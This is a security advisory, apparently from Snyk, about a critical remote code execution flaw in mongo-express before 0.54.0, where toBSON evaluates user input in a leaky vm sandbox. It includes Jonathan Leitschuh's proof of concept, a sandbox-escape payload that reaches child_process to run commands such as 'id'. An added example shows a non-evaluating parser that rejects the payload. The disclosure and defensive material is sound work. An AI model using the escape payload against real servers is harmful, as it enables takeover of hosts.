Remote Code Execution (RCE) Affecting mongo-express package, versions <0.54.0


Severity

critical (CVSS assessment made by Snyk's Security Team)

Threat Intelligence
  • Exploit Maturity: Mature
  • EPSS: 97.46% (100th percentile)

  • Snyk ID SNYK-JS-MONGOEXPRESS-473215
  • published 16 Oct 2019
  • disclosed 14 Oct 2019
  • credit Jonathan Leitschuh

How to fix?

Upgrade mongo-express to version 0.54.0 or higher.

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap 3.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. The method misuses the vm dependency to evaluate user-supplied input as code, and because the sandbox does not isolate that code from the host process, arbitrary commands can be executed on the server.

PoC by Jonathan Leitschuh

// macOS variant: launches Calculator
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

// Test case: the payload is passed to toBSON, which evaluates it as code
it('should not be executable', function () {
  const test = `
    this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
  `;
  const result = bson.toBSON(test);
});
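The mitigation pattern behind the fix, as an added example that is not part of the advisory or of the mongo-express code base: a document parser that never evaluates its input, so the escape payload above is a syntax error rather than code. The ObjectId class and the function names are assumptions made for this example.

```javascript
// Added example, not mongo-express code. Contrast with the vulnerable pattern:
// passing user input to vm.runInNewContext() evaluates it as JavaScript, and
// this.constructor.constructor(...) reaches the host process from the sandbox.
// A strict parser never evaluates, so the same string is just a syntax error.

// Stand-in for the bson library's ObjectId (assumed shape, for this example only).
class ObjectId {
  constructor(hex) {
    if (typeof hex !== 'string' || !/^[0-9a-f]{24}$/i.test(hex)) {
      throw new TypeError('invalid ObjectId: expected 24 hex characters');
    }
    this.hex = hex.toLowerCase();
  }
}

// JSON.parse reviver: only two Extended JSON wrappers are turned into typed
// values; anything else stays plain data and is never executed.
function reviveExtended(key, value) {
  if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
    const keys = Object.keys(value);
    if (keys.length === 1 && keys[0] === '$oid') return new ObjectId(value.$oid);
    if (keys.length === 1 && keys[0] === '$date') {
      const d = new Date(value.$date);
      if (Number.isNaN(d.getTime())) throw new TypeError('invalid $date');
      return d;
    }
  }
  return value;
}

// Returns { ok: true, doc } for a well-formed object, { ok: false, error } otherwise.
function parseDocument(input) {
  try {
    const doc = JSON.parse(input, reviveExtended);
    if (doc === null || typeof doc !== 'object' || Array.isArray(doc) ||
        doc instanceof ObjectId || doc instanceof Date) {
      return { ok: false, error: 'document must be a JSON object' };
    }
    return { ok: true, doc };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// The advisory's escape payload is rejected without ever being evaluated.
console.log(parseDocument('this.constructor.constructor("return process")()'));
console.log(parseDocument('{"_id": {"$oid": "507f1f77bcf86cd799439011"}, "n": 1}'));
```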

CVSS Scores

version 3.1

Snyk: 10 critical
  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): None
  • User Interaction (UI): None
  • Scope (S): Changed
  • Confidentiality (C): High
  • Integrity (I): High
  • Availability (A): High

NVD: 9.9 critical